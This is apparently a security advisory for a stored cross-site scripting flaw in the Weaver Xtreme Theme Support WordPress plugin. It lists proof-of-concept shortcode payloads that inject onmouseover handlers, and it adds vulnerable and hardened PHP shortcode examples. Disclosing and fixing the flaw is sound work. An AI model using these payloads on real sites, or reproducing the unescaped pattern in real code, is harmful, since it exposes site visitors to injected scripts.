wpexploit / Lana Codes / WPEX-ID: D00824A3-7DF5-4B52-A31B-5FDFB19C970F
History: Mar 29, 2023 - 12:00 a.m.

Weaver Xtreme Theme Support < 6.2.7 - Contributor+ Stored XSS

Published: 2023-03-29 00:00:00
Author: Lana Codes
Tags: xss, weaver xtreme, stored, contributor+, theme, wordpress, attributes, background, border, color, style, id, class, height, vimeo, youtube, site tagline, site title

EPSS: 0.001 (Low), percentile 23.7%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page or post where the shortcode is embedded, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks.

Required theme: https://wordpress.org/themes/weaver-xtreme

[box background='red" onmouseover="alert(/XSS-background/)"']
Other affected attributes (found when verifying the issue): border_rule, border_radius, color, margin, padding, style

Other affected shortcodes identified when verifying the issue:

[bloginfo style='"onmouseover=alert(/XSS-style/)//']

[div id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[span id='"onmouseover=alert(/XSS-id/)//']
Other affected attributes: class, style

[header_image style='"onmouseover=alert(/XSS-style/)//']
Other affected attributes: h, w

[html args='onmouseover=alert(/XSS-args/) style=display:block;width:100px;height:100px;background:red']

[iframe src='"onmouseover=alert(/XSS-src/)//']
[iframe src='1' height='"onmouseover=alert(/XSS-height/)//']
Other affected attributes: percent, style

[site_tagline style='"onmouseover=alert(/XSS-style/)//']

[site_title style='"onmouseover=alert(/XSS-style/)//']

[vimeo id='"onmouseover=alert(/XSS-id/)//']
[vimeo id='1' color='"onmouseover=alert(/XSS-color/)//']
Other affected attributes: percent

[youtube id='"onmouseover=alert(/XSS-id/)//']
[youtube id='1' autohide='"onmouseover=alert(/XSS-autohide/)//']
Other affected attributes: color, color1, color2, end, fs, iv_load_policy, origin, percent, playlist, rel, showinfo, start, wmode
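As an added illustration of the defect class behind every entry above and of its fix (example code written for this page, not the plugin's own handlers; the function names are hypothetical), a minimal [box] shortcode that interpolates its attributes unescaped, beside a hardened form that validates each attribute for what it is meant to be and escapes it for the HTML attribute context:

```php
<?php
// Added example, not Weaver Xtreme Theme Support code. Runs inside WordPress.

// Vulnerable pattern: the attribute value is concatenated straight into the tag.
// A value containing a double quote therefore ends the style attribute and
// whatever follows it becomes new attributes on the element.
function example_box_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'background' => '', 'class' => '', 'style' => '' ), $atts, 'box' );
    return '<div class="' . $atts['class'] . '" style="background:' . $atts['background'] . ';' . $atts['style'] . '">';
}

// Hardened pattern: constrain each attribute to its expected shape, then escape
// the final value for the attribute context before output.
function example_box_hardened( $atts ) {
    $atts = shortcode_atts( array( 'background' => '', 'class' => '', 'style' => '' ), $atts, 'box' );

    // Build the CSS from the individual attributes, then pass it through the
    // WordPress CSS filter, which drops declarations with unknown properties.
    $css = '';
    if ( '' !== $atts['background'] ) {
        $css .= 'background:' . $atts['background'] . ';';
    }
    $css .= $atts['style'];
    $css  = safecss_filter_attr( $css );

    // A class list may contain only characters that are valid in class names.
    $classes = array_filter( array_map( 'sanitize_html_class', preg_split( '/\s+/', $atts['class'] ) ) );

    // esc_attr() encodes quotes and angle brackets, so no value can terminate
    // the attribute it is placed in, whatever the filters above let through.
    return sprintf(
        '<div class="%s" style="%s">',
        esc_attr( implode( ' ', $classes ) ),
        esc_attr( $css )
    );
}
add_shortcode( 'box', 'example_box_hardened' );
```

An attribute that is designed to carry raw attribute text, like the args attribute of the [html] shortcode above, cannot be made safe by escaping alone; it needs an allow-list of attribute names with per-attribute validation, or should not be exposed to Contributor-level users at all.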

